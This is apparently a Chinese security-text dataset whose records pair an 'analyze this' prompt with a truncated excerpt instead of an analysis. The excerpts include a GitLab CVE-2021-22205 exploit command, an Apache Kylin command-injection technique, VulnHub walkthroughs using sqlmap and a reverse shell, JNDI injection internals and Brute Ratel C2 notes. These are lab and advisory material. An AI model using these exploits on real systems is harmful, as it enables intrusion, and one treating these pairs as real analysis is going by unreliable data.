{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nKey-Logger, Video, Mouse How to turn your KVM into a raging key-logging monster MEETTHETEAM Yaniv Balmas This should theoretically work Security Researcher Lior Oppenheim The mad scientist Check Point Software Technologies Check Point Software Technologies Security Researcher TOOMANYCOMPUTERS  Computers  More computers  A LOT OF COMPUTERS WHATISKVM?  Keyboard, Video, Mouse  KVM Connects the same Keyboard, Video and Mouse to one or more computers. KVMEVOLUTION 1981 `A-B Switch` 2002 Desktop KVM 2015 Enterprise KVM WHEREARETHEY?  On top of your server racks.  On your desktop.  In your security centres. KVMS ARE EVERYWHERE!! Introducing Gen-KVM ITRUNSCODE  On screen configuration display.  Configurable hot-keys.  Control device functionality through keyboard. Exploitable? + + = First Attempt (Funny meme here) SOFTWARE  Opening the KVM box.  Manuals, Cables, Warranty and CD  CD contains A Firmware Upgrade Utility!  Can the firmware be extracted from the upgrade utility?!  Since x86 is no new territory. we can reverse engineer this! MEETTHEBLOB Low Entropy No Strings Undetermined Freq. Analysis FAIL! SERIALSNIFF  Firmware upgrade process is done via a custom serial connection.  It is possible to extract the (possibly) decoded firmware binary from the serial protocol.  Its just a matter of analyzing the serial protocol. PROTOCOLANALYSIS 46 55 a3 00 03 63 40 d7 85 85 32 ea e2 01 6b 85 FU..c@ÖÖ2Í.kÖ 32 a6 d9 d6 e5 df 55 a6 d5 22 04 d6 cd 05 d5 96 2ŸÂflU\".Õ.ñ 27 85 85 d7 40 a5 d7 32 01 32 e2 85 6b ea 85 d9 'ÖÖ@2.2ÖkÍÖŸ df d5 e5 a6 55 d6 a6 04 2d 27 cd 22 d5 d6 96 85 flÂU.-'Õ\"ñÖ a5 01 40 85 d7 d7 81 .@ÖÅ 46 55 23 00 03 63 00 24 FU#..c.$ From Device To Device Fixed Header OpCode Handshake Data Transfer 46 55 90 00 44 49 b8 FUê.DI 46 55 10 00 43 ** 2d 31 ** ** 34 41 2f 31 ** ** FU..C*-1**4A/1** 32 41 00 00 4d 41 49 4e 00 00 00 56 34 32 52 34 2A..MAIN...V42R4 31 37 56 31 30 52 30 38 31 57 37 38 45 36 35 00 17V10R081W78E65. 00 a2 . 46 55 a0 00 43 54 d2 FU.CT 46 55 20 00 00 bb FU ..ª 46", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFreeCulture.org Student movement for free culture free speech free software free culture FreeCulture.org, Inc. P.O. Box 140657 Gainesville, FL 32614-0657 U.S.A. freedom@freeculture.org http://freeculture.org/ FreeCulture.org is a non-profit organization dedicated to promoting and facilitating student involvement in the free culture movement. Launched in April 2004 at Swarthmore College in Pennsylvania, FreeCulture.org has helped establish student groups at colleges and universities across the United States. Today, Free Culture groups exist at nine colleges, with more starting around the world. Founded by two Swarthmore students after suing voting-machine manufacturer Diebold in 2003 for abusing copyright law, FreeCulture.org takes its name from the book Free Culture by Stanford University professor Lawrence Lessig. FreeCulture.org is part of this growing movement, with roots in the free software community, free speech advocates, civil libertarians, media activists, and others. FreeCulture.org is non-partisan and run by the volunteer efforts of students themselves. Each Free Culture campus group is autonomous, and diverse in their interests. Groups with which FreeCulture.org has collaborated include the Electronic Frontier Foundation (EFF), Public Knowledge, Creative Commons, and Downhill Battle. We need your help. Your time, your comments, or your donation help keep us operating and able to help students organize to have a voice in their culture. Your ideas and advice help guide our decision. Please visit our Web site, or join our mailing lists, and help contribute to the discussion. Your effort as a volunteer is vital to our work. Can you help design and administer our Web site? Can you help develop free software tools? Can you help us research issues? Can you help us translate into other languages? Please visit our Web site and see how to lend a hand. We are always interested in new campus groups. If youd like to start a group at your school, please ask us, and we", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n資安攻防遊戲 觀念名詞解釋 GD & Desnet Platfor m 運作 平台 Social 社交互動 Platform 系統平台 軟體服務 Service Crypto 加密算法 資安 攻防 層級 CTF 資安攻防遊戲 (Capture The Flag)  模擬真實世界的駭客攻防  現場 4~8 人組隊共 8~20 隊伍  封閉網路 每隊一台主機 若干服務  購物網站 (flag 在會員資料庫中)  電子郵件 (flag 在機密信件中)  線上遊戲 (flag 在任務關卡寶物中)  防守:維持服務在線 阻止flag被偷  五分鐘一個 round 計算 flag 數量  攻擊:設法偷取其他隊伍服務 flag  flag 成功送計分版 平分失手隊分數 資安生命週期 新服務上線 建構防護機制 服務遭受攻擊 減緩攻擊 修復服務 規則 A 四種層級9 大防守技術24 種攻擊技術  3 Rounds per Game  5 Actions per Round  Install :  New Server Cards to generate points.  Defense :  Protect your Servers.  Attack :  Hack opponents for points.  Mitigation :  Repair damage and keep your services alive.  Scoring Round  Gain points for server status of at the end of each round. 伺服器卡 傷害卡 防禦卡 攻擊卡", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Anonymous Category: Steganography ## Description > **Blast from the Past challenges series** > > In 2017, Anonymous hacked lectures and tutorials to promote the 2nd faculty party, they even hid a message in one of the frames... A PNG file was attached. ## Solution Running `zsteg` on the file reveals the flag: ```console root@kali:/media/sf_CTFs/technion/Anonymous# zsteg anon.png b1,g,lsb,xy .. file: dBase III DBT, version number 0, next free block index 3183084812 b1,g,msb,xy .. file: dBase III DBT, version number 0, next free block index 3177029680 b1,b,msb,xy .. file: dBase III DBT, version number 0, next free block index 4196096609 b1,rgb,lsb,xy .. file: dBase III DBT, version number 0, next free block index 2532068640 b2,g,lsb,xy .. file: dBase III DBT, version number 0, next free block index 3148544642 b2,g,msb,xy .. file: dBase III DBT, version number 0, next free block index 3713359681 b2,b,lsb,xy .. file: dBase III DBT, version number 0, next free block index 3837465664 b2,rgba,lsb,xy .. text: \"cstechnion{d0_n0t_b3c0m3_4_m4ch1n3_maN}\" b3,r,lsb,xy .. file: MacBinary, more flags 0x7, Mon Feb 6 08:28:16 2040 INVALID date, modified Mon Feb 6 08:28:16 2040, type ' ' \"I$\\222H$\\022A\\004\\020H$\\020I$\" b3,g,msb,xy .. file: dBase III DBT, version number 0, next free block index 2454414338 b3,b,msb,xy .. file: StarOffice Gallery theme l\\0216h, 0 objects b3,rgb,msb,xy .. file: 0420 Alliant virtual executable not stripped b4,r,lsb,xy .. file: raw G3 (Group 3) FAX, byte-padded b4,g,lsb,xy .. text: \"2211#\\\"21\\\"\" ``` The flag: `cstechnion{d0_n0t_b3c0m3_4_m4ch1n3_maN}`", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe SOA/XML Threat Model and New XML/SOA/Web 2.0 Attacks & Threats Steve Orrin Dir of Security Solutions, SSG-SPI Intel Corp. Agenda Intro to SOA/Web 2.0 and the Security Challenge The XML/SOA Threat Model Details on XML/Web Services & SOA Threats Next Generation and Web 2.0 Threats The Evolving Enterprise and Environment Summary Q&A What is SOA? A service-oriented architecture is essentially a collection of services. These services communicate with each other and the communication can involve either simple data passing or direct application execution also it could involve two or more services coordinating some activity. What is a Service?  A service is a function that is well-defined, self-contained, and does not depend on the context or state of other services. What is a Web Service?  Typically a web service is XML/SOAP based and most often described by WSDL and Schemas. In most SOA implementations a directory system known as UDDI is used to for Web Service discovery and central publication. What is Web 2.0? Web 2.0, a phrase coined by Tim O'Reilly and popularized by the first Web 2.0 conference in 2004, refers to a second generation of web-based communities and hosted services  such as social-networking sites, wikis and folksonomies  which facilitate collaboration and sharing between users. Although the term suggests a new version of the World Wide Web, it does not refer to an update to Web technical specifications, but to changes in the ways software developers and end-users use the web as a platform. Characteristics of Web 2.0  The transition of web-sites from isolated information silos to sources of content and functionality, thus becoming computing platforms serving web applications to end-users  A social phenomenon embracing an approach to generating and distributing Web content itself, characterized by open communication, decentralization of authority, freedom to share and re-use, and \"the market as a conversation\"  Enhanced organization and categorization ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 研究方向与相关研究者 ## 目录 [TOC] ## 研究方向与项目 整理一些安全数据分析AI驱动安全相关的研究方向与项目 ### 研究方向 以下来自[郑涵](https://zhuanlan.zhihu.com/p/88042567)师傅的文章 - 通过LSTM自动生成webshell黑样本 - 基于GAN网络绕过现有深度学习AV检测模型 - 基于遗传优化算法的的自动化0day样本生成 - 基于贝叶斯信念网络的入侵回溯推理 - 通过攻击链路中已回溯出来的信息进程网络文件横向关联其他被这个团伙入侵的机器然后继承他们的入侵原因 --- 以下来自[404](https://github.com/404notf0und/FXY/blob/master/docs/%E9%9C%80%E6%B1%82%E5%92%8C%E8%AE%BE%E8%AE%A1.md)师傅的文章 - LSTM识别恶意HTTP请求@cdxy - AI-Driven-WAF@exp-db - Phishing URL Classification@surajr - 使用深度学习检测XSS@Webber - 基于深度学习的恶意样本行为检测@ApplePig@360云影实验室 ### 相关项目 #### 关于数据源 参考本文档的[开放安全数据集整理](https://y1ng.org/TheRoadOfSO/0x4_%E5%AE%89%E5%85%A8%E6%95%B0%E6%8D%AE%E5%88%86%E6%9E%90/%3E%3E%3E%20%E6%95%B0%E6%8D%AE%E9%9B%86/0x0_%E5%BC%80%E6%94%BE%E5%AE%89%E5%85%A8%E6%95%B0%E6%8D%AE%E9%9B%86%E6%95%B4%E7%90%86/) #### 学习笔记和资料整合 - [AI-for-Security-Learning](https://github.com/404notf0und/AI-for-Security-Learning) - 安全场景基于AI的安全算法和安全数据分析学习笔记偏工程类学习笔记持续阅读保持对业界技术的跟进和迭代[404 Not Found](https://4o4notfound.org/)师傅的整理一个学习笔记 - [Security Data Science Learning Resources](https://medium.com/@jason_trost/security-data-science-learning-resources-8f7586995040) - 国外研究者[Jason Trost](http://www.covert.io/)整理的安全数据科学学习资料 ## 相关研究者与团队 安全数据分析是一个较为前沿和专业的领域入门的门槛相对较高整理相关研究者信息的目的也是为了能看到这个领域内他人的研究大概方便初学者看到方向 ### 国内 #### 个人 \\[1] cdxy徐越, 阿里云 安全工程师企业安全/入侵检测与响应  数据分析/机器学习爱好者[知乎](https://www.zhihu.com/people/xu-le-zhen-13) \\[2] ailx10[知乎](https://www.zhihu.com/people/ailx10/columns) \\[3] 404 Not F0und蚂蚁金服有同名公众号 \\[4] tanjiti碳基体[个人博客](https://tanjiti.github.io/about/)在[百度](https://www.baidu.com/)做安全产品研发业余专注在入侵检测与大数据安全分析 \\[5] wstart[先知社区](https://xz.aliyun.com/u/395) \\[6] 郑瀚Andrew_Hann阿里云盾机器学习与网络安全[知乎](https://www.zhihu.com/people/ai-shai-tai-yang-de-feng-51/posts)[博客园](https://www.cnblogs.com/LittleHann/) \\[7] 邹先生[freebuf](https://www.freebuf.com/author/%E9%82%B9%E5%85%88%E7%94%9F007) \\[8] 四个菜CSDN[xbs118](https://blog.csdn.net/qq_38262728) \\[9] six[语雀](https://www.yuque.com/u447199)[论文笔记](https://www.yuque.com/u447199/fnixs3) \\[10] 黄诚[个人主页](http", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n环境搭建 ubuntu docker 8g docker pull apachekylin/apache-kylin-standalone:4.0.0 docker run -d \\ -m 8G \\ -p 7070:7070 \\ -p 8088:8088 \\ -p 50070:50070 \\ -p 8032:8032 \\ -p 8042:8042 \\ -p 2181:2181 \\ -p 5005:5005 \\ apachekylin/apache-kylin-standalone:4.0.0 5005是远程调试端口 Kylin 页面http://127.0.0.1:7070/kylin/login admin KYLIN HDFS NameNode 页面http://127.0.0.1:50070 YARN ResourceManager 页面http://127.0.0.1:8088 具体看官方的docker安装文档 https://kylin.apache.org/cn/docs/install/kylin_docker.html 远程调试配置修改 /home/admin/apache-kylin-4.0.0-bin-spark2/bin/kylin.sh 在retrieveStartCommand函数修改 $JAVA ${KYLIN_EXTRA_START_OPTS} ${KYLIN_TOMCAT_OPTS} -Xdebug - Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=5005 -classpath ${KYLIN_TOMCAT_CLASSPATH} org.apache.catalina.startup.Bootstrap start >> ${KYLIN_HOME}/logs/kylin.out 2>&1 & echo $! > ${KYLIN_HOME}/pid & 分析 在 org.apache.kylin.rest.controller.DiagnosisController#dumpProjectDiagnosisInfo 中 跟进dumpProjectDiagnosisInfo 这里getProject()通过 ValidateUtil.convertStringToBeAlphanumericUnderscore(project) 处理但 是 runDiagnosisCLI(args) 中接受的cmd参数仍然是通过project传过来的相当于命令行可控 而且 getProject(ValidateUtil.convertStringToBeAlphanumericUnderscore(project)) 将传入的命 令进行如下处理将除数字字母下划线以外的东西替换为空比如传入命令为 touch 123 将被 替换为 touch123 public static String convertStringToBeAlphanumericUnderscore(String toBeConverted) { return toBeConverted.replaceAll(\"[a-zA-Z0-9_]\", \"\"); } 刚好解决 projectInstance==null 抛出异常的问题 if (null == projectInstance) { throw new BadRequestException( String.format(Locale.ROOT, msg.getDIAG_PROJECT_NOT_FOUND(), project)); } 最后执行的命令如下 再来看创建项目的地方 org.apache.kylin.rest.controller.ProjectController#saveProject 项目名进行 ValidateUtil.isAlphanumericUnderscore() 校验不能有数字字母下划线以外的东 西 完整的利用方式如下以执行命令 touch 123 为例 先创建项目项目名为 touch123 接下来触发命令执行 执行成功 修复方式 git的diff 传入cmd的参数改为projectName而非http传入的projectprojectName经过了 convertStringToBeAlphanumericUnderscore() 处理所以无法输入非字母数字下划线的字符来触 发命令执行 总结 巧妙利用两个函数对于参数处理的特性来进行命令执行值得一学 参考 1. https://securitylab.github.com/advisories/GHSL-2021-1048_GHSL-2021-1051", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n国内SRC漏洞挖掘经验和技巧分享 ID: PwnDog\\硬糖_zzz 唐朝 | 成都体育学院体育新闻专业 前PKAV团队成员 研究方向: Web安全以及...... 关于我 1.SRC个人推荐 2.SRC的规则 3.漏洞挖掘中的个人经验和技巧分享 目录 同程 网易 360 唯品会 腾讯 阿里巴巴 京东 小米 陌陌 滴滴 百度 蚂蚁金服 SRC个人推荐 备注:排名不分先后只为排版好看 白帽子 1.合规手段 2.点到为止 3.漏洞保密 SRC的规则 信息收集 1.厂商域名 2.厂商IP段 3.厂商业务信息 域名收集 1. 基于SSL证书查询 2. 第三方网站接口查询 3. Github 4. DNS解析记录 5. 子域名枚举等等 域名收集 基于SSL证书查询 1.censys.io 2.crt.sh 第三方接口查询网站 1. riskiq 2. shodan 3. findsubdomains 4. censys.io 5. dnsdb.io 案例 案例 案例 案例 案例 案例 IP段收集 ipwhois.cnnic.net.cn IP段收集 IP段收集 ipwhois.cnnic.net.cn IP段收集 端口扫描 Python+Masscan+Nmap 端口扫描 遇到防火墙时 端口扫描 端口扫描 端口扫描 Nmap参数 -sV //识别服务 -sT //只需普通用户权限 -Pn //跳过主机发现过程 --version-all //全部报文测试 --open //只探测开放端口 字典的收集与使用优化 字典的获取 用之于民取之于民 字典获取 域名类字典 https://opendata.rapid7.com/sonar.rdns_v2/ https://opendata.rapid7.com/sonar.fdns_v2/ 300G 脏数据剔除 体力活 站点类字典 1.目录类 2.可执行脚本类 3.参数类 4.静态资源类(js) 字典获取 站点类字典 1000+ Code AND Regex! 字典获取 字典获取 字典获取 字典获取 案例 Uber 某站二次注入 JS泄露API+API爆破+参数爆破=二次注入 案例 案例 案例 案例 403 or 404 此地无银三百两! 案例 案例 案例 http://106.**.**.147/adver/landing.php?mac=1 字典的使用优化 量大 关键词入库 增加计数int字段 扫描器命中时增加计数 下次提取字典时降序提取 业务安全 业务是核心,但也有薄弱点 1.非普通用户拥有的权限如商家合作方 2.新上线业务 APP测试 SSL Pining 越狱ios禁止SSL Pinning抓App Store的包 ios: http://pwn.dog/index.php/ios/ios-disable-ssl-pinning.html 瘦蛟舞安卓证书锁定解除的工具 Android: https://github.com/WooyunDota/DroidSSLUnpinning END 谢谢大家", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\\\"******************************************************************* .\\\" .\\\" This file was generated with po4a. Translate the source file. .\\\" .\\\"******************************************************************* .TH SHA384SUM 1 2022年9月 \"GNU coreutils 9.1\" 用户命令 .SH 名称 sha384sum \\- 计算并校验 SHA384 信息摘要 .SH 概述 \\fBsha384sum\\fP [\\fI\\,选项\\/\\fP]... [\\fI\\,文件列表\\/\\fP]... .SH 描述 .\\\" Add any additional description here .PP 输出或检查 SHA384 (384位) 校验和 .PP 如果没有指定文件或者指定文件为\\-则从标准输入读取 .TP \\fB\\-b\\fP, \\fB\\-\\-binary\\fP 以二进制模式读入 .TP \\fB\\-c\\fP, \\fB\\-\\-check\\fP 从指定文件中读取校验和信息并对它们进行检查 .TP \\fB\\-\\-tag\\fP 创建一个 BSD 风格的校验和 .TP \\fB\\-t\\fP, \\fB\\-\\-text\\fP 以文本模式读入默认 .TP \\fB\\-z\\fP, \\fB\\-\\-zero\\fP 以 NUL 空字符而非换行符结束每一输出行同时禁用文件名转义 .SS 下面五个选项仅在验证校验和时有用 .TP \\fB\\-\\-ignore\\-missing\\fP 遇到缺失的文件时不报告错误保持静默 .TP \\fB\\-\\-quiet\\fP 不要为每个成功验证的文件显示成功信息 .TP \\fB\\-\\-status\\fP 不要输出任何信息由返回值判断成功与否 .TP \\fB\\-\\-strict\\fP 为没有正确格式化的校验和文字行给出非零返回值 .TP \\fB\\-w\\fP, \\fB\\-\\-warn\\fP 为没有正确格式化的校验和文字行给出警告信息 .TP \\fB\\-\\-help\\fP 显示此帮助信息并退出 .TP \\fB\\-\\-version\\fP 显示版本信息并退出 .PP 校验和按照 FIPS\\-180\\-2 描述的方式进行计算在校验过程中其输入内容应当为该程序先前的输出内容默认模式是输出一行文字包含校验和一个指示输入模式的字符'*' 指示二进制输入' ' 指示二进制特性不明显的文本输入以及每个文件的名称 .PP 注意GNU 系统上二进制模式和文本模式没有区别 .SH 作者 由 Ulrich Drepper, Scott Miller 和 David Madore 编写 .SH 报告错误 GNU coreutils 的在线帮助 <https://www.gnu.org/software/coreutils/> .br 请向 <https://translationproject.org/team/zh_CN.html> 报告翻译错误 .SH 版权 Copyright \\(co 2022 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>. .br 本软件是自由软件您可以自由修改和重新发布它在法律允许的范围内不提供任何保证 .SH 参见 \\fBcksum\\fP(1) .PP .br 完整文档请见 <https://www.gnu.org/software/coreutils/sha384sum> .br 或者在本地使用 info \\(aq(coreutils) sha2 utilities\\(aq", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nznew === 将.Z压缩包重新转化为gzip命令压缩的.gz压缩包 ## 补充说明 **znew命令** 用于将使用compress命令压缩的.Z压缩包重新转化为使用gzip命令压缩的.gz压缩包 ### 语法 ```shell znew(选项)(参数) ``` ### 选项 ```shell -f# 强制执行转换操作即是目标.gz已经存在 -t# 删除原文件前测试新文件 -v# 显示文件名和每个文件的压缩比 -9# 使用最高压缩率速度较慢 -P# 使用管道完成转换操作以降低磁盘空间使用 -K# 当.Z文件比.gz文件小时保留.Z文件 ``` ### 参数 文件指定compress指令压缩生成的.Z压缩包", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Sedna > https://download.vulnhub.com/hackfest2016/Sedna.ova 靶场IP`192.168.32.197` 扫描对外端口服务 ``` (rootkali)-[/tmp] # nmap -p 1-65535 -sV 192.168.32.197 Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-02 03:56 EDT Nmap scan report for 192.168.32.197 Host is up (0.0017s latency). Not shown: 65523 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0) 53/tcp open domain ISC BIND 9.9.5-3 (Ubuntu Linux) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) 110/tcp open pop3 Dovecot pop3d 111/tcp open rpcbind 2-4 (RPC #100000) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 143/tcp open imap Dovecot imapd (Ubuntu) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 993/tcp open ssl/imaps? 995/tcp open ssl/pop3s? 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 48824/tcp open status 1 (RPC #100024) MAC Address: 00:0C:29:0E:11:4D (VMware) Service Info: Host: SEDNA; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.71 seconds ``` 访问80端口 ![image-20220902162451408](../../.gitbook/assets/image-20220902162451408.png) 爆破web目录 ``` (rootkali)-[/tmp] # dirb http://192.168.32.197 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Fri Sep 2 04:25:23 2022 URL_BASE: http://192.168.32.197/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.32.197/ ---- ==> DIRECTORY: http://192.168.32.197/blocks/ ==> DIRECTORY: http://192.168.32.197/files/ + http://192.168.32.197/index.html (CODE:200|SIZE:101) ==> DIRECTORY: http://192.168.32.197/modules/ + http://192.168.32.197/robots.txt (CODE:200|SIZE:36) + http://192.168.32.197/server-status (CODE:403|SIZE:294) ==> DIRECTORY: http://192.168.32.197/system/ ==> DIRECTORY: http://192.168.32.197/themes/ ---- ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nMetasploit vSploit Modules 1 Marcus J. Carey David bannedit Rude Will Vandevanter Outline  Objective of vSploit Modules  Metasploit Framework architecture  What are Metasploit modules?  vSploit modules  vSploit and Intrusion Kill Chains  vSploit and Intrusion Kill Chains  Writing Metasploit Modules  Live Demo 2  Metasploit Project founded in 2003  Open Source penetration testing platform based with over 1 million downloads in the past year  Acquired by Rapid7 in 2009  HD Moore joined Rapid7 as Chief Security Office and Chief Metasploit overview  HD Moore joined Rapid7 as Chief Security Office and Chief Architect of Metasploit  Rapid7 remains committed to the Community  Metasploit Framework is the foundation for the commercial editions Metasploit Express and Metasploit Pro 3 LIBRARIES INTERFACES Rex MSF Core Console CLI TOOLS Metasploit Framework Architecture MODULES MSF Core MSF Base Payload Encoder NOP Auxiliary PLUGINS RPC Exploit GUI & Armitage 4 LIBRARIES INTERFACES Rex MSF Core Console CLI TOOLS Metasploit Framework Architecture MODULES MSF Core MSF Base Payload Encoder NOP Auxiliary PLUGINS RPC Exploit GUI & Armitage 5 What are Metasploit Modules?  More than just exploits  Payloads  the arbitrary code you hear about in advisories  Encoders  add entropy to payloads, remove bad characters  NOP  create sophisticated nopsleds  Auxiliary  Like an exploit module but without a payload  Underappreciated 6 Which would you pick for a training drill? Live Ammo? Or Paint Balls? 7 = Live Exploits = vSploit Modules Introducing: vSploit Modules  New spin on auxiliary modules  Focus on attack response emulation  Not intended for exploitation  Continues with Metasploit roots as security testing and validation framework  Allows organizations to understand their current security  Allows organizations to understand their current security investment  Stand-alone compatibility  No exploitation used  Possible to remove exploit modules if necessary in some environments 8  Evaluate de", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# GitLab 远程命令执行漏洞CVE-2021-22205 GitLab是一款Ruby开发的Git项目管理平台在11.9以后的GitLab中因为使用了图片处理工具ExifTool而受到漏洞[CVE-2021-22204](https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html)的影响攻击者可以通过一个未授权的接口上传一张恶意构造的图片进而在GitLab服务器上执行任意命令 参考链接 - https://hackerone.com/reports/1154542 - https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html - https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/ - https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-22205.yaml ## 漏洞环境 执行如下命令启动一个GitLab 13.10.1版本服务器 ``` docker compose up -d ``` 环境启动后访问`http://your-ip:8080`即可查看到GitLab的登录页面 ## 漏洞复现 GitLab的/uploads/user接口可以上传图片且无需认证利用[poc.py](poc.py)脚本来测试这个漏洞 ``` python poc.py http://your-ip:8080 \"touch /tmp/success\" ``` ![](1.png) 进入容器内可见`touch /tmp/success`已成功执行 ![](2.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\njndi注入高版本绕过与反序列化 昨天群里聊到这了虽然都是炒冷饭但有些细节可能分析清楚点也有好处主要分析分三个部分 1jndi注入的原理 2jndi注入与反序列化的关系 3jndi注入与jdk版本的关系 jndi注入的原理 jndi是java用于访问目录和命名服务的 API使用jndi进行查询本来是一个正常的功能但由于实现时没 有考虑安全问题如果查询恶意对象就会导致被攻击但攻击的结果并不一定是rce jndi的查询大致可以分两步 1客户端请求一个命名服务并获取一个对象 2客户端解析这个对象 那么漏洞出现在哪步呢实际上是两步都有可能因为jndi支持RMILDAPCORBADNS四种协议 每种都对应不同的实现支持绑定的对象有序列化对象引用对象属性对象等所以攻击路径很多 漏洞也很多 在攻击中常用的有jndi+rmi和jndi+ldap实际上corba也可以用于攻击但基本能用corba打的都能用 rmi打并且流程很啰嗦所以这里就分析这jndi+rmi和jndi+ldap两种实现 jndi+rmi 关键代码在RegistryContext#lookup 可以看到第一步远程对象obj是通过原生rmi的lookup获取的了解rmi的就知道是通过反序列化获取 的实际上如果系统里有gadget这一步反序列化的时候就可以导致代码执行了 然后第二步在decodeObject里面对获取到的对象进行了解析 逻辑在RegistryContext#decodeObject里面 public Object lookup(Name name) throws NamingException { if (name.isEmpty()) { return (new RegistryContext(this)); } Remote obj; try { obj = registry.lookup(name.get(0)); } catch (NotBoundException e) { throw (new NameNotFoundException(name.get(0))); } catch (RemoteException e) { throw (NamingException)wrapRemoteException(e).fillInStackTrace(); } return (decodeObject(obj, name.getPrefix(1))); private Object decodeObject(Remote r, Name name) throws NamingException { try { Object obj = (r instanceof RemoteReference) ? ((RemoteReference)r).getReference() 注释里写的很明白如果com.sun.jndi.rmi.object.trustURLCodebase为true就可以通过codebase加载 任意远程类导致代码执行这个校验是在jdk8u121开启的并且是加在RegistryContext里面的也 就是只对了jndi的rmi实现作了限制所以后续才会有ldap的绕过 然后调用的是NamingManager.getObjectInstance这个函数就是前面说的所谓的解析远程对象的函 数 : (Object)r; /* * Classes may only be loaded from an arbitrary URL codebase when * the system property com.sun.jndi.rmi.object.trustURLCodebase * has been set to \"true\". */ // Use reference if possible Reference ref = null; if (obj instanceof Reference) { ref = (Reference) obj; } else if (obj instanceof Referenceable) { ref = ((Referenceable)(obj)).getReference(); } if (ref != null && ref.getFactoryClassLocation() != null && !trustURLCodebase) { throw new ConfigurationException( \"The object factory is untrusted. Set the system property\" + \" 'com.sun.jndi.rmi.object.trustURLCodebase'", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# PWNOS2.0 下载地址https://download.vulnhub.com/pwnos/pWnOS_v2.0.7z ## 实战演练 靶机的IP为静态地址10.10.10.100 ![](../../.gitbook/assets/1554693388_5caabd0c3e7d2.png) ![](../../.gitbook/assets/1554694670_5caac20e45fbe.png) ![](../../.gitbook/assets/1554694907_5caac2fbf22db.png) ![](../../.gitbook/assets/1554695434_5caac50a20765.png) 这里面有注入漏洞sqlmap跑一下 ![](../../.gitbook/assets/1554695515_5caac55b07d54.png) 注入漏洞 ![](../../.gitbook/assets/1554695657_5caac5e91b7d2.png) 写入反弹shell ![](../../.gitbook/assets/1554696629_5caac9b5af8c1.png) ![](../../.gitbook/assets/1554696686_5caac9ee3d127.png) nc监听 ![](../../.gitbook/assets/1554696889_5caacab92274c.png) 查找密码找到了这个密码不能登录 ![](../../.gitbook/assets/1554697172_5caacbd461971.png) 找到了这个密码可以登录 ![](../../.gitbook/assets/1554697328_5caacc70deaa2.png) 另外一种思路 ![](../../.gitbook/assets/1554702181_5caadf6522235.png) blog系统版本 ![](../../.gitbook/assets/1554702244_5caadfa4e66f2.png) 查找漏洞的版本 ![](../../.gitbook/assets/1554702441_5caae0696e3d7.png) 使用exp ![](../../.gitbook/assets/1554702616_5caae11847de4.png) 不知道为什么没有生成cookie就这样把", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBRC4 - Brute Ratel Customized Command and Control Center Ratel War Room Ratel Server - TeamServer API Ratel War Room is an API driven server which works over HTTP and WebSocket Start Mode Ratel Mode Ratel mode is the core server mode which interacts with badgers, starts listener and is your main C2 communication channel. Boomerang Mode In Boomerang mode, the server acts as a standalone socks and HTTPS proxy server. APIs /access /status /task Brute Commander Warmongers - Users Add Warmonger C4 profiles { \"admin_list\": { \"admin\": \"admin@123\" }, \"user_list\": { \"brute\": \"password@123\", \"ratel\": \"password@123\" } } Delete Warmonger Reset Warmonger Warmonger List Covert Communication C4 Profilers export import C4 Profiler - Listners Add Listeners Create Listener C4 Profiler->Add Listener C2 Authentication Common Authentication for all badgers OTA or One Time Authentication View Authentication Change Authentication Stop Listener Hosted Files Add New URI Listener Actions->Add New URI Host Files Listener Actions->Host File View Hosted C4 Profiler->Hosted Files Root Page Manager C4 Profiler->Change Root Page C4 Profiler - Payload Payload Profiles via Brute Commander 